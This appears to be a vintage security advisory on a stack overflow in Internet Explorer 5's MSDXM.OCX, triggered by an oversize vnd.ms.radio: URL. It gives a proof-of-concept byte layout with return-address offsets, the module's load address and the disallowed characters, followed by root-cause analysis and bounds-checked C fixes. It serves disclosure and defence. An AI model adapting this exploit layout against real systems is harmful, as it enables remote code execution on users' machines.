COMMAND
Internet Explorer
SYSTEMS AFFECTED
IE5 (9x, NT)
PROBLEM
Jeremy Kothe found the following. Evaluating
"vnd.ms.radio:\\aaaaaaaaaaa...." causes an exploitable stack
overrun. By providing an oversize (360 byte) URL using the
vnd.ms.radio protocol, a malicious web site or e-mailer (or...)
can cause arbitrary code to be executed on a client machine.
The file with the overrun is MSDXM.OCX - 807,184 bytes. It came
with IE 5.xxx, and is identical on every installation seen so
far. This was tested on:
IE: 5.00.2314.1003IC
IE: 5.00.2614.3500
Windows: 98 OSR 1
NT Wks 4.0 SP5
The following is the binary for a URL or link which overflows the
stack and displays a simple MessageBox, then loops endlessly
(ExitProcess wasn't around). Jeremy used addresses from MSDXM.OCX
which is where the overrun is. If you banged your head against
richedxx.dll (solar d. spyrit,...), then you'll appreciate this
file. It's mapped at 0x1d300000 and is 800k, and all chars
except 0, 9, 0a, 0c, 20, 22, 23, 25, 2e, 2f, 5c are allowed in
the buffer.
Off Text Binary (where non-text)
------------------------------------------------
000 vnd.ms.radio:\\j
010 kwashere9991.... C0890783
020 ..PWWP....0...00 EF0C, FF151416, 1DEBFE
030 0000000000000000
040 0000000000000000
050 0000000000000000
060 0000000000000000
070 0000000000000000
080 0000000000000000
090 0000000000000000
0A0 0000000000000000
0B0 0000000000000000
0C0 0000000000000000
0D0 0000000000000000
0E0 0000000000000000
0F0 0000000000000000
100 0000000000000000
110 0000000000000000
120 0000000000000000
130 0000000000.00000 1D
140 00.000.000.000.0 1D, 1D, 1D, 1D
150 000.o6.0000000.0 1A6F361D, 1D
160 000000.0 1D
------------------------------------------------
Straight after the "vnd.ms.radio:\\", there is data, then code.
Jeremy placed them there because there's over 0x100 bytes of
space here, and edi points to offset 1bh at the point of no
return. If you need more space (writing a word processor?), IE
allows somewhere between 2-4k in addition to what he used (which
would be large enough for a modest "worm".) The address at offset
154h overwrites the return address with a pointer to a "call edi"
which calls the code...
All the other "1D"'s are to provide readable pointers to avoid
exceptions while waiting for the end of the call. (They're
actually 0x1d303030's.)
How did it happen? Jeremy coded the exploit without paying much
attention to what the source was saying, then at the end decided
he would go and find out how a relatively new piece of software
like this could allow a dreary old unchecked stack overflow. The
original exception was reported within msvcrt.dll's mcsstr
function. The stack had been overwritten, but the arguments and
return address for mcsstr (and no further) were written over the
top. This meant the overrun must have occurred in the calling
function. The return address is in MSDXM.OCX at 0x1d365585.
Looking back upwards from the call to mcsstr, the previous call
is to _mbsnbcat (strncat). Should be safe enough. Above that is
_mbsrchr (strrchr). That's benign also. Next comes the (guess)
inevitable - an inline strcpy into a 0x100 byte buffer situated
on the stack 0x40 bytes into the local frame.
Examining further reveals that the author is assuming that the
final portion of the url (after the last forward or back-slash) is
less than 256 chars. Basically, it boils down to:
{
char acBuffer[ 256 ];
strcpy( acBuffer, pszInput );
}
again.
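For contrast, here is a minimal sketch of the same operation with
the length checked before the copy. It is not the code in
MSDXM.OCX; the names last_segment and copy_last_segment are
hypothetical, and it uses the single-byte strrchr rather than the
_mbs* functions the original calls, so it assumes a single-byte
character set.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: returns the part of url after the last '/'
   or '\\', or url itself if it contains no separator.
   Assumes a single-byte character set. */
const char *last_segment(const char *url)
{
    const char *fwd  = strrchr(url, '/');
    const char *back = strrchr(url, '\\');
    const char *sep  = fwd;

    if (back != NULL && (sep == NULL || back > sep))
        sep = back;
    return sep != NULL ? sep + 1 : url;
}

/* Copies the last segment of url into dst, whose capacity is
   dst_size bytes including the terminator.
   Returns 0 on success, -1 if the segment would not fit. */
int copy_last_segment(char *dst, size_t dst_size, const char *url)
{
    assert(dst != NULL && url != NULL);

    const char *seg = last_segment(url);
    size_t len = strlen(seg);      /* find out how big it is first */

    if (len >= dst_size)
        return -1;                 /* reject instead of overrunning */
    memcpy(dst, seg, len + 1);     /* len + 1 copies the terminator */
    return 0;
}
```

A caller with a 256 byte stack buffer would pass sizeof the buffer
as dst_size and treat -1 as a malformed URL, rather than assuming
the segment is short.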
Conclusions: 1. Static buffers kill.
2. Functions which fill buffers without size
constraints are evil.
3. If you don't know how big it is, find out before
you copy it.
4. None of these conclusions are new.
In short, sized strings: 12329852,
null-terminated strings: 0.
The root of the problem is this: the APIs of nearly all OSes
require terminated strings. The programmer is therefore required
to use them. The provided functions for converting are so messy,
and the support functions for sized strings so (comparatively)
convoluted, that using sized strings internally while converting
them for the API is not practical. Programming
for Windows in particular gets messy, because you must use
ANSI-style strings to maintain 9x compatibility, and convert to
sized to use COM/OLE. If you EVER see a classic-style overrun in,
say, a Delphi app, you know it was related (however distantly) to
an API call. Other than that, there is no reason to use anything
but "string"s, and therefore no maximum string lengths - Unless
you count 4gb as a limit... (one day.)
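To make the idea concrete, here is a rough sketch of a sized
string in C that keeps a terminator on hand for API calls. The
type sized_str and its functions are hypothetical, invented for
illustration, and the terminated view assumes the data contains
no embedded zero bytes.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical sized string: the length is stored, never inferred. */
typedef struct {
    size_t len;    /* number of bytes in use, excluding terminator */
    char  *data;   /* len bytes plus one terminator for API calls  */
} sized_str;

/* Builds a sized string from len bytes at src. Returns 0 or -1. */
int sized_str_init(sized_str *s, const char *src, size_t len)
{
    assert(s != NULL && (src != NULL || len == 0));

    s->len = 0;
    s->data = NULL;
    if (len == SIZE_MAX)
        return -1;                  /* len + 1 would wrap around */
    s->data = malloc(len + 1);
    if (s->data == NULL)
        return -1;
    if (len > 0)
        memcpy(s->data, src, len);
    s->data[len] = '\0';
    s->len = len;
    return 0;
}

/* Appends b to a, growing a as needed. Returns 0 or -1. */
int sized_str_append(sized_str *a, const sized_str *b)
{
    size_t blen = b->len;
    int self = (a == b);            /* appending a string to itself */

    if (blen > SIZE_MAX - a->len - 1)
        return -1;                  /* combined length would wrap */
    char *p = realloc(a->data, a->len + blen + 1);
    if (p == NULL)
        return -1;
    memcpy(p + a->len, self ? p : b->data, blen);
    p[a->len + blen] = '\0';
    a->data = p;
    a->len += blen;
    return 0;
}

/* Terminated view for passing to an API that expects a C string. */
const char *sized_str_cstr(const sized_str *s)
{
    return s->data;
}

void sized_str_free(sized_str *s)
{
    free(s->data);
    s->data = NULL;
    s->len = 0;
}
```

Nothing here has a fixed maximum length; the only limits are
available memory and the range of size_t.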
SOLUTION
This exploit does not seem to affect the version of Internet
Explorer bundled with Windows Millennium Beta 2 (build 4.90.2419).
That version of IE is reported as 5.50.3825.1300, and the
pertinent information for MSDXM.OCX is as follows:
Version: 6.4.7.1028
Size: 843,536 bytes
This exploit also seems ineffective against the version of IE that
is bundled with Windows 2000 Professional RC3 (build 2183).
MSDXM.OCX:
Version: 6.4.9.1109
Size: 842,240 (on disk)
IE Version: 5.00.2920.0000
The exploit also fails on IE 5.00.2014.0216 (Win98) with all the
latest patches installed, so it has probably been fixed in a
previous patch, most likely one of the earlier ones, as it wasn't
exploitable some months ago either.
MSDXM.OCX is a DirectShow filter that passes DirectShow streams
to an appropriate codec, receives the response, and uses the
other DirectX functions to draw (or play) the resulting stream to
the user's hardware (at least, that's what I've been able to
glean from some documentation). And, no doubt, the newer version
suffers from some similar stack overrun characteristics.
The C-Standards people need to do something. This is an almost
uniquely C-based problem. Deprecate null-terminated strings
and/or any function which fills one without a maximum. Make
sized strings a compiler-supplied service with syntax as simple
as VB or Delphi, with typecasting support for converting for
APIs. Relying on classes and macros is very noble, but produces
unavoidable syntactical subtleties which detract from the
simplicity of the concept of string-manipulation. This leaves
most programmers resorting to the (still too-messy) concept of
using BSS or stack buffers. Why should any programmer have to
think about people feeding programs into their "strings"?
Strings should be as easy to use as integers. Arrays of
characters can then revert to being... just that, and can be
strictly bounds-checked... and the script kiddies will have to
learn cryptography... and might get jobs.